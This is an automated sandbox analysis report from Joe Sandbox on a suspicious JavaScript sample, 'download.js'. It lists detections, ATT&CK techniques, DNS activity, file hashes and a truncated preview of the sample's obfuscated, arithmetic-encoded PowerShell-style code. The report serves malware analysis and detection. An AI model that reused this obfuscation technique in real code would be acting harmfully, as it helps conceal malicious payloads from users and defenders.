Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.js

Overview

General Information

Sample name:download.js
Analysis ID:1559078
MD5:397a3ddda7003366c39e5f067e8a41e0
SHA1:85aa408bf461f458215b5dd31b6ba90ec11c6601
SHA256:e529690779cf0abb982b45619666dd0bbe61e2c7abbae38844c3398540348a5c
Tags:jsKongTukeuser-monitorsg
Infos:

Detection

Score:22
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Sigma detected: WScript or CScript Dropper
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6716 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 6716, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js", ProcessId: 6716, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: download.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: sus22.winJS@1/0@0/0
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation2
Scripting
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping2
System Information Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
Boot or Logon Initialization Scripts1
Obfuscated Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.js3%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
fp2e7a.wpc.phicdn.net
192.229.221.95
truefalse
    high
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1559078
    Start date and time:2024-11-20 06:58:09 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 2m 7s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:3
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:download.js
    Detection:SUS
    Classification:sus22.winJS@1/0@0/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Found application associated with file extension: .js
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
    • Excluded IPs from analysis (whitelisted): 93.184.221.240, 4.245.163.56, 13.95.31.18
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
    No simulations
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    fp2e7a.wpc.phicdn.netfile.exeGet hashmaliciousLummaCBrowse
    • 192.229.221.95
    6GvQSVIEIu.exeGet hashmaliciousUnknownBrowse
    • 192.229.221.95
    NW_EmployerNewsletter_11142024_pdf.htmlGet hashmaliciousUnknownBrowse
    • 192.229.221.95
    gggghh.exeGet hashmaliciousFormBookBrowse
    • 192.229.221.95
    file.exeGet hashmaliciousRemcosBrowse
    • 192.229.221.95
    https://www.amtso.org/check-desktop-phishing-page/Get hashmaliciousUnknownBrowse
    • 192.229.221.95
    FACTURA 4377.exeGet hashmaliciousUnknownBrowse
    • 192.229.221.95
    WEqMZ4qrbX.dllGet hashmaliciousUnknownBrowse
    • 192.229.221.95
    exe005(1).exeGet hashmaliciousBerbewBrowse
    • 192.229.221.95
    exe002(1).exeGet hashmaliciousBerbewBrowse
    • 192.229.221.95
    No context
    No context
    No context
    No created / dropped files found
    File type:ASCII text, with very long lines (12272), with CRLF line terminators
    Entropy (8bit):6.014135356739472
    TrID:
      File name:download.js
      File size:21'123 bytes
      MD5:397a3ddda7003366c39e5f067e8a41e0
      SHA1:85aa408bf461f458215b5dd31b6ba90ec11c6601
      SHA256:e529690779cf0abb982b45619666dd0bbe61e2c7abbae38844c3398540348a5c
      SHA512:5bc76790f0f2e3baacf8e536e7eab9b1ddee0225d757d283b5b371bb64ddc44247c8c3e180f3c9de8420ab677054d995fb11af9f332dab6b888ae49cb6e5032c
      SSDEEP:384:auFX8s5e5w6zzyocuNHvPBJIFpww5gXV27MH7Wkc/bKj6:aY8KoculPIvwwiXV24b2T3
      TLSH:DC929EE5B740ECD2529DC77F861A3C0D37A8957DD0965FC4B2A4C2C1BB517406EA8C91
      File Content Preview:$hyzpculnkf=$executioncontext;$eresatanesanreenesinreberebeinatedores = (-jOiN (@((9516-(7933+1530)),(-5891+5943),(6508-(5625+826)),(81500/1630),(9699-(11874-(8388-6157))),(-3429+(450+3033)),(333-(-2974+3251)),(7088-(37246768/(556080/105))),(-4866+(14034-
      Icon Hash:68d69b8bb6aa9a86
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Nov 20, 2024 06:59:08.843539953 CET1.1.1.1192.168.2.50x1eb6No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      Nov 20, 2024 06:59:08.843539953 CET1.1.1.1192.168.2.50x1eb6No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:00:59:11
      Start date:20/11/2024
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download.js"
      Imagebase:0x7ff6078b0000
      File size:170'496 bytes
      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
      Has elevated privileges:false
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      No disassembly